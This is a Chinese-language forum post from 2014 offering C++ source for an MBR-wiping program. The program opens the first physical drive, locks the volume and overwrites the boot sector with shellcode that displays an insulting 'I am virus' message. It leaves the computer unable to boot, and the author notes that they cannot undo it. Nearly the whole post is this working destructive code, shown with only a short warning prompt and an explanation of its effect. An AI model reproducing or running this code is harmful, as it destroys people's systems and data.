Evo. G Tech Team Forum
Welcome to Evo. G Tech Team Forum. We have moved to a new website : www.evogtechteam.com

Thanks you.

by Evo. G Tech Team Management.

C++ 硬盘毁灭代码 相当于硬盘锁吧

View previous topic View next topic Go down

C++ 硬盘毁灭代码 相当于硬盘锁吧

Post by cyjian on December 13th 2014, 09:46

#include

#include

#include



unsigned char scode[] =//重启系统后的信息,可以修改成其他的任意字符串

"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"

"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"

"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

int KillMBR()

{
HANDLE hDevice;


ORD dwBytesWritten, dwBytesReturned;


BYTE pMBR[512] = {0};



// 重新构造MBR


memcpy(pMBR, scode, sizeof(scode) - 1);


pMBR[510] = 0x55;


pMBR[511] = 0xAA;




hDevice = CreateFile


(


"\\\\.\\PHYSICALDRIVE0",


GENERIC_READ | GENERIC_WRITE,


FILE_SHARE_READ | FILE_SHARE_WRITE,


NULL,


OPEN_EXISTING,


0,


NULL


);


if (hDevice == INVALID_HANDLE_VALUE)


return -1;


DeviceIoControl


(


hDevice,


FSCTL_LOCK_VOLUME,


NULL,


0,


NULL,


0,


&dwBytesReturned,


NULL


);


// 写入病毒内容


WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);


DeviceIoControl


(


hDevice,


FSCTL_UNLOCK_VOLUME,


NULL,


0,


NULL,


0,


&dwBytesReturned,


NULL


);


CloseHandle(hDevice);


ExitProcess(-1);


return 0;







}



void main()

{


char str[]="确定要运行程序吗?\n本程序将会对电脑的MBR进行破坏使电脑不能进入系统!\n另外,本人还没学会恢复方法!";


if(MessageBox(0,str,"警告",MB_OKCANCEL+MB_ICONWARNING)==IDOK)


{


KillMBR();


}


ExitProcess(-1);



运行本程序后,系统当时并无任何反应,但是一旦重启系统,则再也无法进入系统,因为系统分区表已经被破坏,除非提前备份MBR。或用相关专业知识恢复分区表。

cyjian
Spammer
Spammer

Posts : 211
Points : 25615
Reputation : 0
Join date : 2014-06-18

View user profile

Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum